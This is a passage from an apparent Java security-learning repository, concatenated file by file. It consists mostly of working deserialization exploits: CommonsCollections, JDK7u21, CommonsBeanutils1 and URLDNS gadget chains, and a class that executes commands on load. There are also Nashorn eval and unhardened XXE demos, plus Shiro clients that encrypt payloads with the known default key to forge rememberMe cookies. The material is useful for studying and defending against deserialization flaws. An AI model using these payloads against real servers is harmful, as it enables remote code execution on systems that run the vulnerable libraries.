        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        // Trigger: the value is passed through the chain on insertion.
        outerMap.put("test", "xxxx");
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import org.apache.commons.codec.binary.Base64;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.HashSet;
import java.util.LinkedHashSet;
import java.util.Map;

/**
 * JDK-only gadget (no third-party library) for JDK <= 7u21:
 * LinkedHashSet.readObject() -> HashMap.put() -> hash collision between a TemplatesImpl and a
 * Proxy(Templates) backed by AnnotationInvocationHandler -> equals() on the proxy
 * -> AnnotationInvocationHandler.equalsImpl() invokes every Templates method on the other object,
 * including newTransformer(), which loads evil.EvilTemplatesImpl.
 *
 * The collision is engineered with a member name whose String.hashCode() is 0 ("f5a5a608"):
 * the handler's hashCode then reduces to the hash of the single map value, which is the
 * TemplatesImpl itself (NOTE(review): mechanism inferred from the construction below; verify
 * against the JDK source of AnnotationInvocationHandler.hashCodeImpl()).
 *
 * WARNING: main() deserializes the payload in-process, executing the embedded class locally.
 */
public class JDK7u21 {
    public static void main(String[] args) throws Exception {
        // Payload carrier; _tfactory is transient and only matters for the local test below.
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", new byte[][]{
                ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode()
        });
        setFieldValue(templates, "_name", "HelloTemplatesImpl");
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

        // A string whose hashCode() is 0.
        String zeroHashCodeStr = "f5a5a608";

        // Create the member map keyed by the magic string f5a5a608; the value is a placeholder for now
        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");

        // Instantiate AnnotationInvocationHandler reflectively (non-public class) for the Templates type
        Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        handlerConstructor.setAccessible(true);
        InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map);

        // Wrap tempHandler in a dynamic proxy implementing Templates
        Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler);

        // Create a LinkedHashSet and add both objects. Insertion order matters: templates must be
        // already present when the proxy is inserted so the target's HashMap.put() compares them.
        HashSet set = new LinkedHashSet();
        set.add(templates);
        set.add(proxy);

        // Only now point the map entry at the malicious templates, so the placeholder "foo" is used
        // while the set is built here and the collision is produced only on the target.
        map.put(zeroHashCodeStr, templates);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(set);
        oos.close();

        // Dumps the raw payload, then triggers it locally (executes the embedded class in this JVM).
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }

    /**
     * Writes {@code value} into the field {@code fieldName} declared directly on obj's class,
     * bypassing access checks (TemplatesImpl has no setters for these fields).
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.collections.Transformer;
import
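org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

/**
 * CommonsCollections1-style TransformedMap gadget carrying a TemplatesImpl payload:
 * AnnotationInvocationHandler.readObject() -> TransformedMap -> ChainedTransformer
 * -> ConstantTransformer(templates) -> InvokerTransformer("newTransformer")
 * -> TemplatesImpl.newTransformer(), which defines the class in _bytecodes and runs it.
 *
 * Like the sibling CommonsCollections3 class, the chain is built with a placeholder and
 * armed via reflection only after all wiring is done (the original declared
 * fakeTransformers but never used it).
 *
 * WARNING: main() deserializes the payload in-process, executing the embedded class locally.
 */
public class TemplatesImplDeserialization {
    /**
     * Writes {@code value} into the field {@code fieldName} declared directly on obj's class,
     * bypassing access checks (the gadget classes expose no setters for these fields).
     * Note: getDeclaredField() does not search superclasses.
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        // source: bytecodes/HelloTemplateImpl.java (class file bytes, Base64-encoded)
        byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE=");
        // Payload carrier; _tfactory is transient on TemplatesImpl and only matters for the
        // local readObject() test below (NOTE(review): confirm against the target JDK).
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // Harmless placeholder used while the payload is wired up.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        // Real chain: templates -> templates.newTransformer().
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(obj),
                new InvokerTransformer("newTransformer", null, null)
        };

        // Build with the placeholder (consistent with CommonsCollections3) so the real
        // chain is never live in this process before it is serialized.
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        // NOTE(review): the key must name a member of the annotation type used below (Retention.value).
        innerMap.put("value", "xxxx");
        // Value transformer only; the key transformer is null.
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

        // Deserialization entry point; non-public class, hence reflection + setAccessible.
        // NOTE(review): this readObject() path was hardened in later JDK 8 updates, so the
        // TransformedMap trigger is expected to work only on older JDKs.
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
        construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);

        // Arm the chain now that construction is finished.
        setFieldValue(transformerChain, "iTransformers", transformers);

        // ==================
        // Build the serialized payload
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(handler);
        oos.close();

        // Trigger locally for testing (executes the embedded class in this JVM)
        // System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object) ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java:
--------------------------------------------------------------------------------
package com.govuln.deserialization;

import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;

/**
 * URLDNS: the simplest JDK-only gadget. Deserializing a HashMap with a java.net.URL key
 * recomputes URL.hashCode(), which resolves the host name and thus produces a DNS lookup
 * for the attacker-controlled domain. No code execution; used to confirm that a target
 * deserializes untrusted input at all.
 */
public class URLDNS {

    /**
     * Handler used only while building the payload: it never opens a connection and returns
     * null from getHostAddress(), so URL.hashCode() does not resolve the host on this machine.
     * URL.handler is transient, so the target falls back to its default handler and does resolve.
     */
    static class SilentURLStreamHandler extends URLStreamHandler {

        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }

    /**
     * Writes {@code value} into the field {@code fieldName} declared directly on obj's class,
     * bypassing access checks (used here to reset URL's cached hashCode).
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String []args) throws Exception {
        // Replace with your own DNS-logging domain (e.g. a Burp Collaborator / DNSLog host).
        String url = "http://dns.675ba661.y7z.xyz";

        //Avoid DNS resolution during payload creation
        //Since the field java.net.URL.handler is transient, it will not
        //be part of the serialized payload.
        URLStreamHandler handler = new SilentURLStreamHandler();

        HashMap ht = new HashMap(); // HashMap that will contain the URL
        URL u = new URL(null, url, handler); // URL to use as the Key
        ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

        // put() above already computed and cached the hash (URL caches it in a private int field);
        // reset it to -1 so the target's HashMap.readObject() has to recompute it.
        setFieldValue(u, "hashCode", -1);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(ht);
        oos.close();

        // Dumps the raw payload, then triggers it locally (this JVM performs the DNS lookup).
        System.out.println(barr);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object o = (Object)ois.readObject();
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/js/Eval.java:
--------------------------------------------------------------------------------
package com.govuln.js;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import java.io.FileReader;

import jdk.nashorn.api.scripting.NashornException;
import jdk.nashorn.api.scripting.NashornScriptEngine;
import jdk.nashorn.api.scripting.NashornScriptEngineFactory;

import java.io.InputStream;
import java.lang.Exception;

/**
 * Evaluates src/main/resources/eval.js with the JDK's JavaScript engine (Nashorn on JDK 8).
 * Script run through javax.script has the full privileges of the JVM (it can reach
 * java.lang.Runtime etc.), so this must never be pointed at untrusted input.
 */
public class Eval {
    /**
     * @throws IllegalStateException if no "JavaScript" engine is registered; the original code
     *         would NPE here on JDKs without Nashorn (deprecated in 11, removed in 15)
     * @throws Exception on script errors or if the file cannot be read
     */
    public static void main(String[] args) throws Exception {
        ScriptEngineManager manager = new ScriptEngineManager();
        ScriptEngine engine = manager.getEngineByName("JavaScript");
        if (engine == null) {
            throw new IllegalStateException("No JavaScript script engine is available on this JDK");
        }
        // try-with-resources: the original never closed the FileReader.
        try (FileReader script = new FileReader("src/main/resources/eval.js")) {
            engine.eval(script);
        }
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/serialization/Converter.java:
--------------------------------------------------------------------------------
package com.govuln.serialization;

import java.io.ByteArrayOutputStream;
import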
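java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;

/**
 * Packs a list of values into the wire format used by the RMI/serialization write-ups:
 * primitives and Strings are written with DataOutputStream, everything else is Java-serialized
 * with the 4-byte stream header (STREAM_MAGIC 0xACED + STREAM_VERSION 0x0005) stripped, so the
 * result can be spliced into an already-open serialization stream.
 */
public class Converter {
    /**
     * Encodes each element of {@code objs} in order (see treatObject) and returns the bytes.
     *
     * @param objs values to encode; null elements are Java-serialized as TC_NULL
     * @throws IOException if serialization of an element fails
     */
    public static byte[] toBytes(Object[] objs) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        // try-with-resources so the stream is closed even if treatObject throws.
        try (DataOutputStream dos = new DataOutputStream(baos)) {
            for (Object obj : objs) {
                treatObject(dos, obj);
            }
        }
        return baos.toByteArray();
    }

    /**
     * Writes one value: Byte/Short/Integer/Long as big-endian primitives, String as
     * modified-UTF-8 (writeUTF, 2-byte length prefix), anything else as a Java
     * serialization stream minus its 4-byte header.
     *
     * @throws IOException if the object is not Serializable or the write fails
     */
    public static void treatObject(DataOutputStream dos, Object obj)
            throws IOException {
        if (obj instanceof Byte) {
            dos.writeByte((Byte) obj);
        } else if (obj instanceof Short) {
            dos.writeShort((Short) obj);
        } else if (obj instanceof Integer) {
            dos.writeInt((Integer) obj);
        } else if (obj instanceof Long) {
            dos.writeLong((Long) obj);
        } else if (obj instanceof String) {
            dos.writeUTF((String) obj);
        } else {
            ByteArrayOutputStream ba = new ByteArrayOutputStream();
            // Closed on every path; the original leaked the stream when writeObject threw.
            try (ObjectOutputStream oos = new ObjectOutputStream(ba)) {
                oos.writeObject(obj);
            }
            dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header
        }
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java:
--------------------------------------------------------------------------------
package com.govuln.serialization;

import com.govuln.serialization.model.User;
import org.apache.commons.codec.binary.Base64;

import java.io.*;

/** Serializes a small User object graph and prints it Base64-encoded, for inspecting the stream format. */
public class UserSerialization {
    public static void main(String[] args) throws Exception
    {
        write();
    }

    /**
     * Builds User("Bob") with parent User("Josua"), serializes it and prints the Base64 form.
     * The ObjectOutputStream is now closed before the buffer is read (the original never
     * flushed or closed it).
     */
    public static void write() throws Exception
    {
        User user = new User("Bob");
        user.setParent(new User("Josua"));
        ByteArrayOutputStream byteSteam = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(byteSteam)) {
            oos.writeObject(user);
        }

        System.out.println(Base64.encodeBase64String(byteSteam.toByteArray()));
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/serialization/model/User.java:
--------------------------------------------------------------------------------
package com.govuln.serialization.model;

import java.io.Serializable;

/**
 * Minimal Serializable model used by UserSerialization. No explicit serialVersionUID is
 * declared on purpose: the UID is then computed from the class shape, and adding one would
 * change the class descriptor in streams generated so far.
 */
public class User implements Serializable {
    // Both fields are part of the serialized form; parent may be null.
    protected String name;
    protected User parent;

    public User(String name)
    {
        this.name = name;
    }

    public void setParent(User parent)
    {
        this.parent = parent;
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java:
--------------------------------------------------------------------------------
package com.govuln.xxe;

import org.w3c.dom.Document;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;

/**
 * XXE demo with a default-configured DocumentBuilderFactory, which resolves external
 * entities declared in a DOCTYPE. Deliberately left unhardened; a safe parser would call
 * factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
 * (or at least disable external-general-entities / external-parameter-entities and set
 * XMLConstants.FEATURE_SECURE_PROCESSING) before newDocumentBuilder().
 */
public class DocumentBuilderExample {
    public static void main(String[] args) throws Exception {
        // NOTE(review): the DOCTYPE/entity declaration and root element appear to have been
        // stripped from this listing; as shown, the string is not a usable XXE document.
        String data = "\n" +
                " ]>\n" +
                "&xxe;";
        DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        Document doc = db.parse(new ByteArrayInputStream(data.getBytes()));
        System.out.println(doc.getDocumentElement().getTextContent());
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java:
--------------------------------------------------------------------------------
package com.govuln.xxe;

import org.xml.sax.helpers.DefaultHandler;

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import java.io.ByteArrayInputStream;

/**
 * XXE demo with a default-configured SAXParserFactory (external entities resolved).
 * Deliberately unhardened; a safe parser would set
 * "http://apache.org/xml/features/disallow-doctype-decl" to true on the factory.
 */
public class SAXParserExample {
    public static void main(String[] args) throws Exception {
        // NOTE(review): the DOCTYPE/entity declaration and root element appear to have been
        // stripped from this listing; as shown, the string is not a usable XXE document.
        String data = "\n" +
                " ]>\n" +
                "&xxe;";
        SAXParser parser = SAXParserFactory.newInstance().newSAXParser();

        // Print character data as it is reported; the expanded entity shows up here.
        parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() {
            public void characters(char[] ch, int start, int length) {
                System.out.print(new String(ch, start, length));
            }
        });
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java:
--------------------------------------------------------------------------------
package com.govuln.xxe;

import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;
import org.xml.sax.helpers.XMLReaderFactory;

import java.io.ByteArrayInputStream;

/**
 * XXE demo with a default-configured XMLReader (external entities resolved).
 * Deliberately unhardened; a safe reader would call
 * reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true).
 */
public class XMLReaderExample {
    public static void main(String[] args) throws Exception {
        // NOTE(review): the DOCTYPE/entity declaration and root element appear to have been
        // stripped from this listing; as shown, the string is not a usable XXE document.
        String data = "\n" +
                " ]>\n" +
                "&xxe;";
        XMLReader reader = XMLReaderFactory.createXMLReader();
        reader.setContentHandler(new DefaultHandler() {
            public void characters(char[] ch, int start, int length) {
                System.out.print(new String(ch, start, length));
            }
        });
        // Bug fix: InputSource(String) takes a *system id* (URI), so the original
        // `new InputSource(data)` tried to fetch the XML text as a URL instead of parsing it.
        reader.parse(new InputSource(new ByteArrayInputStream(data.getBytes())));
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java:
--------------------------------------------------------------------------------
package com.govuln.xxe;

import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamReader;
import java.io.*;

/**
 * XXE demo with a default-configured StAX XMLInputFactory. Deliberately unhardened; a safe
 * factory would set XMLInputFactory.SUPPORT_DTD to false (or at least
 * XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES to false) before creating the reader.
 */
public class XMLStreamExample {
    public static void main(String[] args) throws Exception {
        // NOTE(review): the DOCTYPE/entity declaration and root element appear to have been
        // stripped from this listing; as shown, the string is not a usable XXE document.
        String data = "\n" +
                " ]>\n" +
                "&xxe;";
        InputStream input = new ByteArrayInputStream(data.getBytes());
        XMLInputFactory factory = XMLInputFactory.newFactory();
        XMLStreamReader reader = factory.createXMLStreamReader(input);

        // Walk the event stream; entity content surfaces as text events.
        while (reader.hasNext()) {
            reader.next();
            if (reader.isStartElement()) {
                System.out.println("Start: " + reader.getLocalName());
            } else if (reader.isEndElement()) {
                System.out.println("End: " + reader.getLocalName());
            } else if (reader.hasText()) {
                System.out.println("Data: " + reader.getText().trim());
            }
        }
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java:
--------------------------------------------------------------------------------
package com.govuln.xxe;

import org.xml.sax.InputSource;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathExpression;
import javax.xml.xpath.XPathFactory;
import java.io.ByteArrayInputStream;

/**
 * XXE demo via XPath evaluation on an InputSource: the XPath implementation parses the
 * document with a default (entity-resolving) parser. Deliberately unhardened; to parse
 * safely, build the Document yourself with a hardened DocumentBuilderFactory and evaluate
 * the expression against that Document instead of an InputSource.
 */
public class XPathExpressionExample {
    public static void main(String[] args) throws Exception {
        // NOTE(review): the DOCTYPE/entity declaration and root element appear to have been
        // stripped from this listing; as shown, the string is not a usable XXE document.
        String data = "\n" +
                " ]>\n" +
                "&xxe;";
        XPathFactory xPathFactory = XPathFactory.newInstance();
        XPath xpath = xPathFactory.newXPath();
        XPathExpression xPathExpr = xpath.compile("/foo/text()");

        // Bug fix: InputSource(String) takes a *system id* (URI), so the original
        // `new InputSource(data)` tried to fetch the XML text as a URL instead of parsing it.
        String result = xPathExpr.evaluate(new InputSource(new ByteArrayInputStream(data.getBytes())));
        System.out.println(result);
    }
}
--------------------------------------------------------------------------------
/jdk8/src/main/java/evil/EvilTemplatesImpl.java:
--------------------------------------------------------------------------------
package evil;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class EvilTemplatesImpl extends AbstractTranslet {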
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} 11 | 12 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} 13 | 14 | public EvilTemplatesImpl() throws Exception { 15 | super(); 16 | System.out.println("Hello TemplatesImpl"); 17 | Runtime.getRuntime().exec("calc.exe"); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /jdk8/src/main/java/evil/Hello.java: -------------------------------------------------------------------------------- 1 | package evil; 2 | 3 | public class Hello { 4 | static { 5 | System.out.println("Hello World"); 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /jdk8/src/main/resources/eval.js: -------------------------------------------------------------------------------- 1 | var a = new java.beans.Customizer { 2 | setObject: eval 3 | } 4 | a.object = "java.lang.Runtime.getRuntime\50\51.exec\50'calc.exe'\51"; -------------------------------------------------------------------------------- /shiroattack/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | com.govuln 8 | shiroattack 9 | 1.0-SNAPSHOT 10 | 11 | shiroattack 12 | 13 | http://www.example.com 14 | 15 | 16 | UTF-8 17 | 1.8 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.apache.shiro 24 | shiro-core 25 | 1.2.4 26 | 27 | 28 | 29 | org.javassist 30 | javassist 31 | 3.27.0-GA 32 | 33 | 34 | 35 | commons-collections 36 | commons-collections 37 | 3.2.1 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | maven-clean-plugin 47 | 3.1.0 48 | 49 | 50 | 51 | maven-resources-plugin 52 | 3.0.2 53 | 54 | 55 | maven-compiler-plugin 56 | 3.8.0 57 | 58 | 59 | maven-surefire-plugin 60 | 2.22.1 61 | 62 | 63 | maven-jar-plugin 64 | 3.0.2 65 | 66 | 67 | maven-install-plugin 68 | 2.5.2 69 | 70 | 71 | maven-deploy-plugin 72 | 2.8.2 73 | 74 | 75 | 76 
| maven-site-plugin 77 | 3.7.1 78 | 79 | 80 | maven-project-info-reports-plugin 81 | 3.0.0 82 | 83 | 84 | 85 | 86 | 87 | org.apache.maven.plugins 88 | maven-compiler-plugin 89 | 90 | 8 91 | 8 92 | 93 | 94 | 95 | 96 | 97 | -------------------------------------------------------------------------------- /shiroattack/shiroattack.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Client.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import javassist.ClassPool; 4 | import javassist.CtClass; 5 | import org.apache.shiro.crypto.AesCipherService; 6 | import org.apache.shiro.util.ByteSource; 7 | 8 | public class Client { 9 | public static void main(String []args) throws Exception { 10 | ClassPool pool = ClassPool.getDefault(); 11 | CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); 12 | byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); 13 | 14 | AesCipherService aes = new AesCipherService(); 15 | byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); 16 | 17 | ByteSource ciphertext = aes.encrypt(payloads, key); 18 | System.out.printf(ciphertext.toString()); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Client0.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import org.apache.shiro.crypto.AesCipherService; 4 | import org.apache.shiro.util.ByteSource; 5 | 6 | public class Client0 { 7 | public static void main(String []args) throws Exception { 8 | byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); 9 | AesCipherService aes = new AesCipherService(); 10 | 
byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); 11 | 12 | ByteSource ciphertext = aes.encrypt(payloads, key); 13 | System.out.printf(ciphertext.toString()); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Client1.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import javassist.ClassPool; 4 | import javassist.CtClass; 5 | import org.apache.shiro.crypto.AesCipherService; 6 | import org.apache.shiro.util.ByteSource; 7 | 8 | public class Client1 { 9 | public static void main(String []args) throws Exception { 10 | ClassPool pool = ClassPool.getDefault(); 11 | CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); 12 | byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode()); 13 | 14 | AesCipherService aes = new AesCipherService(); 15 | byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); 16 | 17 | ByteSource ciphertext = aes.encrypt(payloads, key); 18 | System.out.printf(ciphertext.toString()); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import org.apache.commons.beanutils.BeanComparator; 6 | 7 | import java.io.ByteArrayOutputStream; 8 | import java.io.ObjectOutputStream; 9 | import java.lang.reflect.Field; 10 | import java.util.PriorityQueue; 11 | 12 | public class CommonsBeanutils1Shiro { 13 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 14 
| Field field = obj.getClass().getDeclaredField(fieldName); 15 | field.setAccessible(true); 16 | field.set(obj, value); 17 | } 18 | 19 | public byte[] getPayload(byte[] clazzBytes) throws Exception { 20 | TemplatesImpl obj = new TemplatesImpl(); 21 | setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); 22 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 23 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 24 | 25 | final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); 26 | final PriorityQueue queue = new PriorityQueue(2, comparator); 27 | // stub data for replacement later 28 | queue.add("1"); 29 | queue.add("1"); 30 | 31 | setFieldValue(comparator, "property", "outputProperties"); 32 | setFieldValue(queue, "queue", new Object[]{obj, obj}); 33 | 34 | // ================== 35 | // 生成序列化字符串 36 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 37 | ObjectOutputStream oos = new ObjectOutputStream(barr); 38 | oos.writeObject(queue); 39 | oos.close(); 40 | 41 | return barr.toByteArray(); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import org.apache.commons.collections.Transformer; 4 | import org.apache.commons.collections.functors.ChainedTransformer; 5 | import org.apache.commons.collections.functors.ConstantTransformer; 6 | import 